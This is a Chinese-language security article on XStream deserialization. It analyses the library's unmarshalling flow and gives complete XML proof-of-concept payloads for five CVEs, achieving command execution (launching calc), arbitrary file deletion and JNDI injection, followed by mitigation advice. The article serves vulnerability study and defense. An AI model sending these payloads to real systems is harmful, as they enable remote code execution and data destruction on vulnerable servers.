XStream历史漏洞分析与利用指南<\/h1>

一、XStream简介<\/h2>
XStream是一个简单的基于Java库，能够将Java对象序列化到XML，也能将XML反序列化为Java对象。核心功能包括：<\/p>
实现Java对象与XML文档的相互转换<\/li>
支持自定义转换器(Converter)处理不同类型数据<\/li>
默认使用反射机制为对象属性赋值<\/li> <\/ul>
序列化示例<\/h3>
public<\/span> class<\/span> People<\/span> {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> int<\/span> age;<\/span>
<\/span><\/span>    private<\/span> Company workCompany;<\/span>
<\/span><\/span>    \/\/ 构造方法和getter\/setter省略
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Company<\/span> {<\/span>
<\/span><\/span>    private<\/span> String companyName;<\/span>
<\/span><\/span>    private<\/span> String companyLocation;<\/span>
<\/span><\/span>    \/\/ 构造方法和getter\/setter省略
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>XStream xStream =<\/span> new<\/span> XStream();<\/span>
<\/span><\/span>People people =<\/span> new<\/span> People(<\/span>"xiaoming"<\/span>,<\/span>25<\/span>,<\/span>new<\/span> Company(<\/span>"TopSec"<\/span>,<\/span>"BeiJing"<\/span>));<\/span>
<\/span><\/span>String xml =<\/span> xStream.<\/span>toXML<\/span>(<\/span>people);<\/span>
<\/span><\/span><\/code><\/pre>序列化差异<\/h3>
是否实现Serializable<\/code>接口会影响生成的XML结构：<\/p>

实现Serializable接口<\/strong>：<\/li>
<\/ol>
<XStream.People<\/span> serialization=<\/span>"custom"<\/span>><\/span>
<\/span><\/span>  <default><\/span>
<\/span><\/span>    <age><\/span>25<\/age><\/span>
<\/span><\/span>    <name><\/span>xiaoming<\/name><\/span>
<\/span><\/span>    <workCompany<\/span> serialization=<\/span>"custom"<\/span>><\/span>
<\/span><\/span>      <XStream.Company><\/span>
<\/span><\/span>        <default><\/span>
<\/span><\/span>          <companyLocation><\/span>BeiJing<\/companyLocation><\/span>
<\/span><\/span>          <companyName><\/span>TopSec<\/companyName><\/span>
<\/span><\/span>        <\/default><\/span>
<\/span><\/span>      <\/XStream.Company><\/span>
<\/span><\/span>    <\/workCompany><\/span>
<\/span><\/span>  <\/default><\/span>
<\/span><\/span><\/XStream.People><\/span>
<\/span><\/span><\/code><\/pre>
未实现Serializable接口<\/strong>：<\/li>
<\/ol>
<XStream.People><\/span>
<\/span><\/span>  <name><\/span>xiaoming<\/name><\/span>
<\/span><\/span>  <age><\/span>25<\/age><\/span>
<\/span><\/span>  <workCompany><\/span>
<\/span><\/span>    <companyName><\/span>TopSec<\/companyName><\/span>
<\/span><\/span>    <companyLocation><\/span>BeiJing<\/companyLocation><\/span>
<\/span><\/span>  <\/workCompany><\/span>
<\/span><\/span><\/XStream.People><\/span>
<\/span><\/span><\/code><\/pre>关键区别：实现Serializable接口时会使用SerializableConverter<\/code>，能触发readObject<\/code>方法。<\/p>
二、XStream反序列化流程分析<\/h2>
反序列化核心流程：<\/p>

TreeUnmarshaller.start()<\/strong> - 开始解析XML<\/li>
HierarchicalStreams.readClassType()<\/strong> - 通过标签名获取对应的Class对象<\/li>
TreeUnmarshaller.convertAnother()<\/strong> - 将Class转换为Java对象

通过mapper.defaultImplementationOf查找Class实现类<\/li>
通过ConverterLookup.lookupConverterForType获取对应转换器<\/li>
<\/ul>
<\/li>
Converter.unmarshal()<\/strong> - 根据获取的对象继续解析子节点<\/li>
递归处理直到完成所有节点解析<\/li>
<\/ol>
关键转换器：<\/p>

ReflectionConverter<\/code>：通过反射为属性赋值<\/li>
SerializableConverter<\/code>：处理实现了Serializable接口的类，会调用readObject方法<\/li>
<\/ul>
三、历史漏洞分析<\/h2>
1. CVE-2013-7285 (XStream <=1.4.6或1.4.10)<\/h3>
漏洞类型<\/strong>：远程代码执行

利用条件<\/strong>：使用动态代理和EventHandler<\/p>
POC<\/strong>：<\/p>
<sorted-set><\/span>
<\/span><\/span>  <string><\/span>foo<\/string><\/span>
<\/span><\/span>  <dynamic-proxy><\/span>
<\/span><\/span>    <interface><\/span>java.lang.Comparable<\/interface><\/span>
<\/span><\/span>    <handler<\/span> class=<\/span>"java.beans.EventHandler"<\/span>><\/span>
<\/span><\/span>      <target<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>        <command><\/span>
<\/span><\/span>          <string><\/span>calc<\/string><\/span>
<\/span><\/span>        <\/command><\/span>
<\/span><\/span>      <\/target><\/span>
<\/span><\/span>      <action><\/span>start<\/action><\/span>
<\/span><\/span>    <\/handler><\/span>
<\/span><\/span>  <\/dynamic-proxy><\/span>
<\/span><\/span><\/sorted-set><\/span>
<\/span><\/span><\/code><\/pre>利用链分析<\/strong>：<\/p>

解析sorted-set<\/code>标签，使用TreeSetConverter<\/code><\/li>
处理dynamic-proxy<\/code>时使用DynamicProxyConverter<\/code><\/li>
创建EventHandler代理<\/li>
在TreeMap.put()时触发EventHandler.invoke()<\/li>
最终调用ProcessBuilder.start()<\/li>
<\/ol>
替代POC<\/strong>（使用tree-map标签）：<\/p>
<tree-map><\/span>
<\/span><\/span>  <entry><\/span>
<\/span><\/span>    <string><\/span>fookey<\/string><\/span>
<\/span><\/span>    <string><\/span>foovalue<\/string><\/span>
<\/span><\/span>  <\/entry><\/span>
<\/span><\/span>  <entry><\/span>
<\/span><\/span>    <dynamic-proxy><\/span>
<\/span><\/span>      <interface><\/span>java.lang.Comparable<\/interface><\/span>
<\/span><\/span>      <handler<\/span> class=<\/span>"java.beans.EventHandler"<\/span>><\/span>
<\/span><\/span>        <target<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span>
<\/span><\/span>          <command><\/span>
<\/span><\/span>            <string><\/span>calc.exe<\/string><\/span>
<\/span><\/span>          <\/command><\/span>
<\/span><\/span>        <\/target><\/span>
<\/span><\/span>        <action><\/span>start<\/action><\/span>
<\/span><\/span>      <\/handler><\/span>
<\/span><\/span>    <\/dynamic-proxy><\/span>
<\/span><\/span>    <string><\/span>good<\/string><\/span>
<\/span><\/span>  <\/entry><\/span>
<\/span><\/span><\/tree-map><\/span>
<\/span><\/span><\/code><\/pre>2. CVE-2020-26217 (XStream <=1.4.13)<\/h3>
漏洞类型<\/strong>：远程代码执行

利用链<\/strong>：基于NativeString和Base64Data的复杂链<\/p>
POC<\/strong>：<\/p>
<map><\/span>
<\/span><\/span>  <entry><\/span>
<\/span><\/span>    <jdk.nashorn.internal.objects.NativeString><\/span>
<\/span><\/span>      <flags><\/span>0<\/flags><\/span>
<\/span><\/span>      <value<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'<\/span>><\/span>
<\/span><\/span>        <dataHandler><\/span>
<\/span><\/span>          <dataSource<\/span> class=<\/span>'com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'<\/span>><\/span>
<\/span><\/span>            <contentType><\/span>text\/plain<\/contentType><\/span>
<\/span><\/span>            <is<\/span> class=<\/span>'java.io.SequenceInputStream'<\/span>><\/span>
<\/span><\/span>              <e<\/span> class=<\/span>'javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'<\/span>><\/span>
<\/span><\/span>                <iterator<\/span> class=<\/span>'javax.imageio.spi.FilterIterator'<\/span>><\/span>
<\/span><\/span>                  <iter<\/span> class=<\/span>'java.util.ArrayList$Itr'<\/span>><\/span>
<\/span><\/span>                    <cursor><\/span>0<\/cursor><\/span>
<\/span><\/span>                    <lastRet><\/span>-1<\/lastRet><\/span>
<\/span><\/span>                    <expectedModCount><\/span>1<\/expectedModCount><\/span>
<\/span><\/span>                    <outer-class><\/span>
<\/span><\/span>                      <java.lang.ProcessBuilder><\/span>
<\/span><\/span>                        <command><\/span>
<\/span><\/span>                          <string><\/span>calc<\/string><\/span>
<\/span><\/span>                        <\/command><\/span>
<\/span><\/span>                      <\/java.lang.ProcessBuilder><\/span>
<\/span><\/span>                    <\/outer-class><\/span>
<\/span><\/span>                  <\/iter><\/span>
<\/span><\/span>                  <filter<\/span> class=<\/span>'javax.imageio.ImageIO$ContainsFilter'<\/span>><\/span>
<\/span><\/span>                    <method><\/span>
<\/span><\/span>                      <class><\/span>java.lang.ProcessBuilder<\/class><\/span>
<\/span><\/span>                      <name><\/span>start<\/name><\/span>
<\/span><\/span>                      <parameter-types\/><\/span>
<\/span><\/span>                    <\/method><\/span>
<\/span><\/span>                    <name><\/span>start<\/name><\/span>
<\/span><\/span>                  <\/filter><\/span>
<\/span><\/span>                  <next\/><\/span>
<\/span><\/span>                <\/iterator><\/span>
<\/span><\/span>                <type><\/span>KEYS<\/type><\/span>
<\/span><\/span>              <\/e><\/span>
<\/span><\/span>              <in<\/span> class=<\/span>'java.io.ByteArrayInputStream'<\/span>><\/span>
<\/span><\/span>                <buf><\/buf><\/span>
<\/span><\/span>                <pos><\/span>0<\/pos><\/span>
<\/span><\/span>                <mark><\/span>0<\/mark><\/span>
<\/span><\/span>                <count><\/span>0<\/count><\/span>
<\/span><\/span>              <\/in><\/span>
<\/span><\/span>            <\/is><\/span>
<\/span><\/span>            <consumed><\/span>false<\/consumed><\/span>
<\/span><\/span>          <\/dataSource><\/span>
<\/span><\/span>          <transferFlavors\/><\/span>
<\/span><\/span>        <\/dataHandler><\/span>
<\/span><\/span>        <dataLen><\/span>0<\/dataLen><\/span>
<\/span><\/span>      <\/value><\/span>
<\/span><\/span>    <\/jdk.nashorn.internal.objects.NativeString><\/span>
<\/span><\/span>    <string><\/span>test<\/string><\/span>
<\/span><\/span>  <\/entry><\/span>
<\/span><\/span><\/map><\/span>
<\/span><\/span><\/code><\/pre>利用链分析<\/strong>：<\/p>

解析map标签，使用MapConverter<\/li>
处理NativeString时调用hashCode()<\/li>
hashCode()调用getStringValue()<\/li>
触发Base64Data.toString()<\/li>
通过DataSource.getInputStream()触发复杂调用链<\/li>
最终通过反射调用ProcessBuilder.start()<\/li>
<\/ol>
3. CVE-2020-26259 (XStream <=1.4.13)<\/h3>
漏洞类型<\/strong>：任意文件删除

利用链<\/strong>：修改CVE-2020-26217的POC<\/p>
POC<\/strong>：<\/p>
<map><\/span>
<\/span><\/span>  <entry><\/span>
<\/span><\/span>    <jdk.nashorn.internal.objects.NativeString><\/span>
<\/span><\/span>      <flags><\/span>0<\/flags><\/span>
<\/span><\/span>      <value<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'<\/span>><\/span>
<\/span><\/span>        <dataHandler><\/span>
<\/span><\/span>          <dataSource<\/span> class=<\/span>'com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'<\/span>><\/span>
<\/span><\/span>            <contentType><\/span>text\/plain<\/contentType><\/span>
<\/span><\/span>            <is<\/span> class=<\/span>'com.sun.xml.internal.ws.util.ReadAllStream$FileStream'<\/span>><\/span>
<\/span><\/span>              <tempFile><\/span>\/test.txt<\/tempFile><\/span>
<\/span><\/span>            <\/is><\/span>
<\/span><\/span>          <\/dataSource><\/span>
<\/span><\/span>          <transferFlavors\/><\/span>
<\/span><\/span>        <\/dataHandler><\/span>
<\/span><\/span>        <dataLen><\/span>0<\/dataLen><\/span>
<\/span><\/span>      <\/value><\/span>
<\/span><\/span>    <\/jdk.nashorn.internal.objects.NativeString><\/span>
<\/span><\/span>    <string><\/span>test<\/string><\/span>
<\/span><\/span>  <\/entry><\/span>
<\/span><\/span><\/map><\/span>
<\/span><\/span><\/code><\/pre>利用原理<\/strong>：

通过FileStream的close()方法删除指定文件：<\/p>
public<\/span> void<\/span> close<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>tempFile !=<\/span> null<\/span> &&<\/span> !<\/span>tempFile.<\/span>delete<\/span>())<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> IOException(<\/span>"File "<\/span> +<\/span> tempFile +<\/span> " could not be deleted"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. CVE-2021-21344 (XStream <=1.4.15)<\/h3>
漏洞类型<\/strong>：远程代码执行(JNDI注入)

利用链<\/strong>：PriorityQueue + JdbcRowSetImpl<\/p>
POC<\/strong>：<\/p>
<java.util.PriorityQueue<\/span> serialization=<\/span>'custom'<\/span>><\/span>
<\/span><\/span>  <unserializable-parents\/><\/span>
<\/span><\/span>  <java.util.PriorityQueue><\/span>
<\/span><\/span>    <default><\/span>
<\/span><\/span>      <size><\/span>2<\/size><\/span>
<\/span><\/span>      <comparator<\/span> class=<\/span>'sun.awt.datatransfer.DataTransferer$IndexOrderComparator'<\/span>><\/span>
<\/span><\/span>        <indexMap<\/span> class=<\/span>'com.sun.xml.internal.ws.client.ResponseContext'<\/span>><\/span>
<\/span><\/span>          <packet><\/span>
<\/span><\/span>            <message<\/span> class=<\/span>'com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'<\/span>><\/span>
<\/span><\/span>              <dataSource<\/span> class=<\/span>'com.sun.xml.internal.ws.message.JAXBAttachment'<\/span>><\/span>
<\/span><\/span>                <bridge<\/span> class=<\/span>'com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'<\/span>><\/span>
<\/span><\/span>                  <bridge<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.BridgeImpl'<\/span>><\/span>
<\/span><\/span>                    <bi<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'<\/span>><\/span>
<\/span><\/span>                      <jaxbType><\/span>com.sun.rowset.JdbcRowSetImpl<\/jaxbType><\/span>
<\/span><\/span>                      <uriProperties\/><\/span>
<\/span><\/span>                      <attributeProperties\/><\/span>
<\/span><\/span>                      <inheritedAttWildcard<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'<\/span>><\/span>
<\/span><\/span>                        <getter><\/span>
<\/span><\/span>                          <class><\/span>com.sun.rowset.JdbcRowSetImpl<\/class><\/span>
<\/span><\/span>                          <name><\/span>getDatabaseMetaData<\/name><\/span>
<\/span><\/span>                          <parameter-types\/><\/span>
<\/span><\/span>                        <\/getter><\/span>
<\/span><\/span>                      <\/inheritedAttWildcard><\/span>
<\/span><\/span>                    <\/bi><\/span>
<\/span><\/span>                    <tagName\/><\/span>
<\/span><\/span>                    <context><\/span>
<\/span><\/span>                      <marshallerPool<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'<\/span>><\/span>
<\/span><\/span>                        <outer-class<\/span> reference=<\/span>marshallerPool<\/span>><\/span>
<\/span><\/span>                          <nameList><\/span>
<\/span><\/span>                            <nsUriCannotBeDefaulted><\/span>
<\/span><\/span>                              <boolean><\/span>true<\/boolean><\/span>
<\/span><\/span>                            <\/nsUriCannotBeDefaulted><\/span>
<\/span><\/span>                            <namespaceURIs><\/span>
<\/span><\/span>                              <string><\/span>1<\/string><\/span>
<\/span><\/span>                            <\/namespaceURIs><\/span>
<\/span><\/span>                            <localNames><\/span>
<\/span><\/span>                              <string><\/span>UTF-8<\/string><\/span>
<\/span><\/span>                            <\/localNames><\/span>
<\/span><\/span>                          <\/nameList><\/span>
<\/span><\/span>                        <\/outer-class><\/span>
<\/span><\/span>                      <\/marshallerPool><\/span>
<\/span><\/span>                    <\/context><\/span>
<\/span><\/span>                  <\/bridge><\/span>
<\/span><\/span>                <\/bridge><\/span>
<\/span><\/span>                <jaxbObject<\/span> class=<\/span>'com.sun.rowset.JdbcRowSetImpl'<\/span> serialization=<\/span>'custom'<\/span>><\/span>
<\/span><\/span>                  <javax.sql.rowset.BaseRowSet><\/span>
<\/span><\/span>                    <default><\/span>
<\/span><\/span>                      <concurrency><\/span>1008<\/concurrency><\/span>
<\/span><\/span>                      <escapeProcessing><\/span>true<\/escapeProcessing><\/span>
<\/span><\/span>                      <fetchDir><\/span>1000<\/fetchDir><\/span>
<\/span><\/span>                      <fetchSize><\/span>0<\/fetchSize><\/span>
<\/span><\/span>                      <isolation><\/span>2<\/isolation><\/span>
<\/span><\/span>                      <maxFieldSize><\/span>0<\/maxFieldSize><\/span>
<\/span><\/span>                      <maxRows><\/span>0<\/maxRows><\/span>
<\/span><\/span>                      <queryTimeout><\/span>0<\/queryTimeout><\/span>
<\/span><\/span>                      <readOnly><\/span>true<\/readOnly><\/span>
<\/span><\/span>                      <rowSetType><\/span>1004<\/rowSetType><\/span>
<\/span><\/span>                      <showDeleted><\/span>false<\/showDeleted><\/span>
<\/span><\/span>                      <dataSource><\/span>rmi:\/\/127.0.0.1:1099\/test<\/dataSource><\/span>
<\/span><\/span>                      <params\/><\/span>
<\/span><\/span>                    <\/default><\/span>
<\/span><\/span>                  <\/javax.sql.rowset.BaseRowSet><\/span>
<\/span><\/span>                  <com.sun.rowset.JdbcRowSetImpl><\/span>
<\/span><\/span>                    <default><\/span>
<\/span><\/span>                      <iMatchColumns><\/span>
<\/span><\/span>                        <int><\/span>-1<\/int><\/span>
<\/span><\/span>                        <int><\/span>-1<\/int><\/span>
<\/span><\/span>                        <!-- 省略其他int --><\/span>
<\/span><\/span>                      <\/iMatchColumns><\/span>
<\/span><\/span>                      <strMatchColumns><\/span>
<\/span><\/span>                        <string><\/span>foo<\/string><\/span>
<\/span><\/span>                        <!-- 省略其他null --><\/span>
<\/span><\/span>                      <\/strMatchColumns><\/span>
<\/span><\/span>                    <\/default><\/span>
<\/span><\/span>                  <\/com.sun.rowset.JdbcRowSetImpl><\/span>
<\/span><\/span>                <\/jaxbObject><\/span>
<\/span><\/span>              <\/dataSource><\/span>
<\/span><\/span>            <\/message><\/span>
<\/span><\/span>            <satellites\/><\/span>
<\/span><\/span>            <invocationProperties\/><\/span>
<\/span><\/span>          <\/packet><\/span>
<\/span><\/span>        <\/indexMap><\/span>
<\/span><\/span>      <\/comparator><\/span>
<\/span><\/span>    <\/default><\/span>
<\/span><\/span>    <int><\/span>3<\/int><\/span>
<\/span><\/span>    <string><\/span>javax.xml.ws.binding.attachments.inbound<\/string><\/span>
<\/span><\/span>    <string><\/span>javax.xml.ws.binding.attachments.inbound<\/string><\/span>
<\/span><\/span>  <\/java.util.PriorityQueue><\/span>
<\/span><\/span><\/java.util.PriorityQueue><\/span>
<\/span><\/span><\/code><\/pre>利用链分析<\/strong>：<\/p>

触发PriorityQueue的readObject()<\/li>
通过IndexOrderComparator.compare()<\/li>
最终触发JdbcRowSetImpl.getDatabaseMetaData()<\/li>
调用connect()导致JNDI注入<\/li>
<\/ol>
5. CVE-2021-21345 (XStream <=1.4.15)<\/h3>
漏洞类型<\/strong>：远程代码执行

利用链<\/strong>：PriorityQueue + ServerTableEntry<\/p>
POC<\/strong>：<\/p>
<java.util.PriorityQueue<\/span> serialization=<\/span>'custom'<\/span>><\/span>
<\/span><\/span>  <unserializable-parents\/><\/span>
<\/span><\/span>  <java.util.PriorityQueue><\/span>
<\/span><\/span>    <default><\/span>
<\/span><\/span>      <size><\/span>2<\/size><\/span>
<\/span><\/span>      <comparator<\/span> class=<\/span>'sun.awt.datatransfer.DataTransferer$IndexOrderComparator'<\/span>><\/span>
<\/span><\/span>        <indexMap<\/span> class=<\/span>'com.sun.xml.internal.ws.client.ResponseContext'<\/span>><\/span>
<\/span><\/span>          <packet><\/span>
<\/span><\/span>            <message<\/span> class=<\/span>'com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'<\/span>><\/span>
<\/span><\/span>              <dataSource<\/span> class=<\/span>'com.sun.xml.internal.ws.message.JAXBAttachment'<\/span>><\/span>
<\/span><\/span>                <bridge<\/span> class=<\/span>'com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'<\/span>><\/span>
<\/span><\/span>                  <bridge<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.BridgeImpl'<\/span>><\/span>
<\/span><\/span>                    <bi<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'<\/span>><\/span>
<\/span><\/span>                      <jaxbType><\/span>com.sun.corba.se.impl.activation.ServerTableEntry<\/jaxbType><\/span>
<\/span><\/span>                      <uriProperties\/><\/span>
<\/span><\/span>                      <attributeProperties\/><\/span>
<\/span><\/span>                      <inheritedAttWildcard<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'<\/span>><\/span>
<\/span><\/span>                        <getter><\/span>
<\/span><\/span>                          <class><\/span>com.sun.corba.se.impl.activation.ServerTableEntry<\/class><\/span>
<\/span><\/span>                          <name><\/span>verify<\/name><\/span>
<\/span><\/span>                          <parameter-types\/><\/span>
<\/span><\/span>                        <\/getter><\/span>
<\/span><\/span>                      <\/inheritedAttWildcard><\/span>
<\/span><\/span>                    <\/bi><\/span>
<\/span><\/span>                    <tagName\/><\/span>
<\/span><\/span>                    <context><\/span>
<\/span><\/span>                      <marshallerPool<\/span> class=<\/span>'com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'<\/span>><\/span>
<\/span><\/span>                        <outer-class<\/span> reference=<\/span>marshallerPool<\/span>><\/span>
<\/span><\/span>                          <nameList><\/span>
<\/span><\/span>                            <nsUriCannotBeDefaulted><\/span>
<\/span><\/span>                              <boolean><\/span>true<\/boolean><\/span>
<\/span><\/span>                            <\/nsUriCannotBeDefaulted><\/span>
<\/span><\/span>                            <namespaceURIs><\/span>
<\/span><\/span>                              <string><\/span>1<\/string><\/span>
<\/span><\/span>                            <\/namespaceURIs><\/span>
<\/span><\/span>                            <localNames><\/span>
<\/span><\/span>                              <string><\/span>UTF-8<\/string><\/span>
<\/span><\/span>                            <\/localNames><\/span>
<\/span><\/span>                          <\/nameList><\/span>
<\/span><\/span>                        <\/outer-class><\/span>
<\/span><\/span>                      <\/marshallerPool><\/span>
<\/span><\/span>                    <\/context><\/span>
<\/span><\/span>                  <\/bridge><\/span>
<\/span><\/span>                <\/bridge><\/span>
<\/span><\/span>                <jaxbObject<\/span> class=<\/span>'com.sun.corba.se.impl.activation.ServerTableEntry'<\/span>><\/span>
<\/span><\/span>                  <activationCmd><\/span>calc<\/activationCmd><\/span>
<\/span><\/span>                <\/jaxbObject><\/span>
<\/span><\/span>              <\/dataSource><\/span>
<\/span><\/span>            <\/message><\/span>
<\/span><\/span>            <satellites\/><\/span>
<\/span><\/span>            <invocationProperties\/><\/span>
<\/span><\/span>          <\/packet><\/span>
<\/span><\/span>        <\/indexMap><\/span>
<\/span><\/span>      <\/comparator><\/span>
<\/span><\/span>    <\/default><\/span>
<\/span><\/span>    <int><\/span>3<\/int><\/span>
<\/span><\/span>    <string><\/span>javax.xml.ws.binding.attachments.inbound<\/string><\/span>
<\/span><\/span>    <string><\/span>javax.xml.ws.binding.attachments.inbound<\/string><\/span>
<\/span><\/span>  <\/java.util.PriorityQueue><\/span>
<\/span><\/span><\/java.util.PriorityQueue><\/span>
<\/span><\/span><\/code><\/pre>利用原理<\/strong>：

通过Accessor$GetterSetterReflection调用任意方法，最终执行：<\/p>
\/\/ ServerTableEntry.verify()
<\/span><\/span><\/span><\/span>Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>activationCmd);<\/span>
<\/span><\/span><\/code><\/pre>变种POC<\/strong>（直接调用ProcessBuilder.start）：<\/p>
<!-- 只需修改jaxbType和getter部分 --><\/span>
<\/span><\/span><jaxbType><\/span>java.lang.ProcessBuilder<\/jaxbType><\/span>
<\/span><\/span><getter><\/span>
<\/span><\/span>  <class><\/span>java.lang.ProcessBuilder<\/class><\/span>
<\/span><\/span>  <name><\/span>start<\/name><\/span>
<\/span><\/span>  <parameter-types\/><\/span>
<\/span><\/span><\/getter><\/span>
<\/span><\/span><\/code><\/pre>四、漏洞利用总结<\/h2>
漏洞利用关键点<\/h3>


转换器选择<\/strong>：<\/p>

使用特定标签触发特定转换器（如sorted-set触发TreeSetConverter）<\/li>
实现Serializable接口可触发SerializableConverter和readObject<\/li>
<\/ul>
<\/li>

利用链构造<\/strong>：<\/p>

动态代理+EventHandler（CVE-2013-7285）<\/li>
复杂对象属性控制（NativeString+Base64Data）<\/li>
反序列化标准链（PriorityQueue+JdbcRowSetImpl）<\/li>
<\/ul>
<\/li>

执行方式<\/strong>：<\/p>

直接命令执行（ProcessBuilder\/Runtime.exec）<\/li>
JNDI注入<\/li>
文件操作（删除\/读取）<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h3>

升级到最新安全版本<\/li>
使用XStream的安全配置：
XStream xstream =<\/span> new<\/span> XStream();<\/span>
<\/span><\/span>\/\/ 禁止特定类型
<\/span><\/span><\/span><\/span>xstream.<\/span>denyTypes<\/span>(<\/span>new<\/span> Class[]{<\/span>EventHandler.<\/span>class<\/span>,<\/span> ImageIO.<\/span>ContainsFilter<\/span>.<\/span>class<\/span>,<\/span> ProcessBuilder.<\/span>class<\/span>});<\/span>
<\/span><\/span>\/\/ 或使用白名单
<\/span><\/span><\/span><\/span>xstream.<\/span>allowTypesByWildcard<\/span>(<\/span>new<\/span> String[]{<\/span>"com.your.package.**"<\/span>});<\/span>
<\/span><\/span><\/code><\/pre><\/li>
避免反序列化不可信数据<\/li>
<\/ol>
五、参考资源<\/h2>

XStream官方文档<\/a><\/li>
XStream安全公告<\/a><\/li>
Java反序列化漏洞原理与实践<\/a><\/li>
<\/ol>
XStream历史漏洞分析与利用指南<\/h1>

三、历史漏洞分析<\/h2>

四、漏洞利用总结<\/h2>

五、参考资源<\/h2> XStream官方文档<\/a><\/li> XStream安全公告<\/a><\/li> Java反序列化漏洞原理与实践<\/a><\/li> <\/ol>

五、参考资源<\/h2>

XStream官方文档<\/a><\/li>
XStream安全公告<\/a><\/li>
Java反序列化漏洞原理与实践<\/a><\/li> <\/ol>
